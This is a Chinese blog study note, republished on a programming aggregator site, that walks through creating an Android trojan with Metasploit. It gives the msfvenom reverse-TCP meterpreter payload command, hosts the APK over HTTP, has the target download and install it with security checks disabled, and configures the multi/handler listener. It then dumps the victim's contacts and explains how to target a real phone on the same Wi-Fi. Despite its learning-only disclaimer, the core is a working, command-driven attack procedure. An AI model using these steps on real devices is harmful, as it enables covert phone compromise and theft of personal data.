我的编程空间,编程开发者的网络收藏夹
学习永远不晚

我的MSF之Android木马渗透的学习笔记

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

我的MSF之Android木马渗透的学习笔记

免责声明:以下内容仅供学习参考,如果用于任何非法途径,后果自负,希望大家做一个遵纪守法的好公民,一起保护国家的的网络安全!!!

环境准备

攻击机:kali

靶机:Android

一、入侵操作

1.木马制作

通过msfvenom制作安卓木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.9.136.152 LPORT=4444 R >android_yuanboss.apk

2.开启http服务

kali 终端输入以下命令开启http服务

python3 -m http.server 80

3.靶机下载木马

由于此安卓虚拟机bug问题,我们无法在该靶机的浏览器中输入对应 ip去下载木马,而是需要到终端输入命令来下载木马:

终端下载命令:

wget 10.9.136.152/android_yuanboss.apk

请添加图片描述

但是发现下载失败,因为android当前目录下是只读文件系统,我们如果需要下载东西,就需要到sdcard目录中进行下载:

cd sdcardwget 10.9.136.152/android_yuanboss.apk

如图所示,表示下载成功:

请添加图片描述

4.安装木马

打开Android中的文件之后,如图所示:

请添加图片描述

最后一个就是我们下载的木马,我们直接傻瓜式安装即可,其中注意安装过程中取消安全检查。

安装完之后,可以在桌面中看到如下图标:

请添加图片描述

5.监听的配置

选择后门模块(必须进行这一步模块的选择,否则无法进行后面的步骤

use exploit/multi/handler 

设置攻击载荷 payload(和创建木马的载荷一样)

set payload android/meterpreter/reverse_tcp 

设置攻击机的 ip (和创建木马时的 ip 一样)

 set lhost 10.9.136.152

设置攻击机的端口 port (和创建木马时的端口一样)

set lport 4444

上述监听配置如图所示:

请添加图片描述

6.启动监听

run

如图所示:

请添加图片描述

7.木马上线

在靶机中打开木马程序

8.监听成功

请添加图片描述

二、渗透操作

1.获取手机通讯录

首先在靶机中的通讯录中添加信息,然后运行木马程序,然后到 kali中运行如下命令:

dump_contacts 

请添加图片描述

根据日志可以得知,通讯录信息存放到了当前目录下的 contacts_dump_20230607062727.txt文件中

接下来通过 cat命令查看该文件:

请添加图片描述

我们可以看到,已经成功获取通讯录信息

三、手机植入木马实战

实操逻辑和上述内容是一样的,只要确保 kali 可以与手机的 ip 相连,就可以实现木马植入。

所以难点在于如何使我们的 kali 和 手机相连,让 kali 与安卓手机相连的流程如下:

如下图所示,我们只需要确保我们的电脑与安卓手机连接同一个无线路由器,为了确保物理机中的kali能和安卓手机处于同一个网段,我们需要给kali设置为桥接模式,并且在虚拟网络编辑器中给桥接网络设置网卡为无线网卡,无线网卡的名字可以在物理机的批处理窗口中通过 ipconfig /all 查看,无线局域网适配器 WLAN的描述内容即为无线网卡名称 。配置好虚拟机之后,查看 kali 与安卓手机的ip地址,即可发现处于同一网段,并且可以kali可以ping通安卓手机的 ip

请添加图片描述

确保 kali 与 安卓 相连成功之后,执行上面的入侵操作与渗透操作即可!

四、总结

Android入侵与Windows是一样的,只需要确保攻击机器与靶机之间网络可以连通,就可以实现渗透利用。

要注意Android文件只有只读权限,我们需要切换到sdcard目录,才能实现文件的下载

文件下载的命令是:

wget ip/文件名例如: weget 10.9.136.152/android_yuanboss.apk

执行上面的入侵操作与渗透操作即可!

来源地址:https://blog.csdn.net/weixin_46367450/article/details/131090921

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

我的MSF之Android木马渗透的学习笔记

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

我的MSF之Android木马渗透的学习笔记

免责声明:以下内容仅供学习参考,如果用于任何非法途径,后果自负,希望大家做一个遵纪守法的好公民,一起保护国家的的网络安全!!! 文章目录 环境准备一、入侵操作1.木马制作2.开启http服务3.靶机下载木马4.安装木马5.监听
2023-08-23

我的Android学习笔记——共享

第一节——基础准备 工具介绍 Eclipse:最原始的开发工具,不过现在Google已经停止对Eclipse的支持 Android Studio:Google的官方开发工具,推荐使用第二节——第一个安卓应用 基本介绍: 1. …/app/s
2022-06-06

android学习笔记之View的滑动

Android开发中我们常常需要View滑动实现一些绚丽的效果来优化用户体验,下面这篇文章主要给大家介绍了关于android学习笔记之View滑动的相关资料,文中通过实例代码介绍的非常详细,需要的朋友可以参考下
2023-01-03

Android学习笔记之Handler处理机制的Looper

Handler处理机制中,需要Looper来动态的进行循环,以此来不断将MessageQueue的数据取出。 在主线程中,Looper和MessageQueue已经在创建好的,因此我们不用自己创建它们就能用。 而在子线程中,如果我们想用Ha
2022-06-06

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录